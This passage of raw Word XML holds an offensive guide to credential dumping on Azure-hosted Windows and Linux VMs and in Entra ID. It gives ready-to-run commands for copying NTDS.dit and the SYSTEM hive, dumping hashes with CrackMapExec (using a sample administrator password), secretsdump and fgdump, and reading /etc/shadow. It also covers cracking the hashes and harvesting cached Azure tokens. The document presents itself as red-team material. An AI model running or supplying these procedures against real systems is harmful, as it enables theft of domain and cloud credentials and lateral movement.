    <w:p w14:paraId="2F209A35" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Remote usage via DRSUAPI or SMB with appropriate creds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C8A2F2" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (CME):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FE086" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Useful for automated dumping on multiple hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF560E0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> &lt;target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>&gt; -u &lt;user&gt; -p &lt;pass&gt; --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7992564D" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E05BB95" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Post-exploitation modules to dump hashes once SYSTEM access is gained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA4DD2" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Copy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and SYSTEM hive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69885385" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>If you have SYSTEM privileges, copy files to attacker-controlled location:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF8F42D" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>copy C:\Windows\NTDS\NTDS.dit C:\Temp\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BC3A8A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>copy C:\Windows\System32\config\SYSTEM C:\Temp\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E91F4" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Transfer files off the VM via SMB, RDP clipboard, or Azure file share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D224F8" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crack Hashes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E10414" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>John the Ripper</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> to crack NTLM hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64663FC4" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">NTDS hashes follow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>pwdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>ntlm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A92D80" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="75CA1C42">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243658A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example Commands for NTDS Hash Dumping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9B1109" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Using secretsdump.py locally on the Domain Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE95F0F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>secretsdump.py -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> C:\Windows\NTDS\NTDS.dit -system C:\Windows\System32\config\SYSTEM LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF0A5A7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> remotely:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170FE464" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> 10.0.0.5 -u Administrator -p 'Password123!' --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57B9994F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>FGDump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> (on Windows VM, local dump):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B4265" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>fgdump.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6ED63D" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>type &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>server_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>&gt;.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>pwdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="791DA8D0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="65AB119A">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E23EC9" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 2: Credential Dumping on Linux Azure VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F4503" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Linux VMs don’t have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>; local accounts use /etc/shadow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16577370" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Use tools like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F45705" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>sudo cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBB31A9" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> or john for cracking shadow hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6CE7E1" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:lastRenderedPageBreak/>
        <w:t>For Azure AD joined Linux, token harvesting is done via Azure CLI or saved tokens in .azure directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C086127" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="6ECF2413">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1883FAC6" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 3: Microsoft Entra ID (Azure AD) Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A383D19" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Azure AD accounts don’t store credentials locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8CA046" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Post-exploitation involves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEDA678" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token harvesting</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> from memory or cached tokens (~/.azure/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>accessTokens.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> on Linux or TokenCache.dat on Windows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B185256" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Use tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AzureADPwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSOLSpray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure AD module for PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B9A1D" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t>Exploit weak app registrations or delegated permissions to escalate privileges or extract secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F42173" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure AD Connect Sync Server</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> to capture password hashes synced to on-prem AD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B42D97" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="1BA7D2A8">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B45DA96" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary of Vulnerabilities Exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF9970" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">: Needed to dump SYSTEM and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E3BB9" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Improper file permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">: Access to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> and SYSTEM hives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F160079" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unpatched Domain Controllers</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t>: Vulnerable to dumping and lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1CFAC0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure AD weaknesses</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t>: Misconfigured app permissions or token caching vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC5497" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="10494449">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD61194" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recap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6"/>
        <w:gridCol w:w="4236"/>
        <w:gridCol w:w="2233"/>
        <w:gridCol w:w="2415"/>
      </w:tblGrid>
